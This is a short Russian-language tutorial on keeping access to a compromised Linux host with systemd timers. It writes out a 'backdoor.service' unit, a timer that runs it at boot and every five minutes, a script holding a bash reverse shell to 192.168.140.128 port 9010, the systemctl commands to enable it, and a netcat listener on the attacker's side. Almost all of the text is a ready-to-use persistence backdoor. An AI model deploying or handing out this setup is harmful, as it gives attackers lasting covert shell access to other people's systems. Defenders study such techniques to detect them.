06 - Systemd Timers

Это пример закрепления точно такой же как и предыдущий, но systemD службы могут запускаться и по расписанию, что гораздно удобнее. Этим мы и воспользуемся. Для этого нам нужно создать 3 файла:

1. Файл службы systemD

2. Файл с расписанием для этой службы

3. Файл вредоносного скрипта

// Создаем сервис /etc/systemd/system/backdoor.service
[Unit]

Description=backdoor service

[Service]

ExecStart=/opt/backdoor.sh

// Создаем для сервиса таймер /etc/systemd/system/backdoor.timer
[Unit]

Description=backdoor timer

[Timer]

OnBootSec=5

OnUnitActiveSec=5m

[Install]

WantedBy=timers.target

// Вредоносный скрипт /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1

Перазапустим службы и включим наш таймер

//
systemctl daemon-reload
systemctl enable backdoor.timer
systemctl start backdoor.timer
systemctl list-timers 

// На хосте атакующего запускам netcat 
nc -lvp 9010

Теперь через каждые 5 минут будет стартовать наша служба, которая стартанет вредоносный скрипт, а он в свою очередь отдаст нам шел.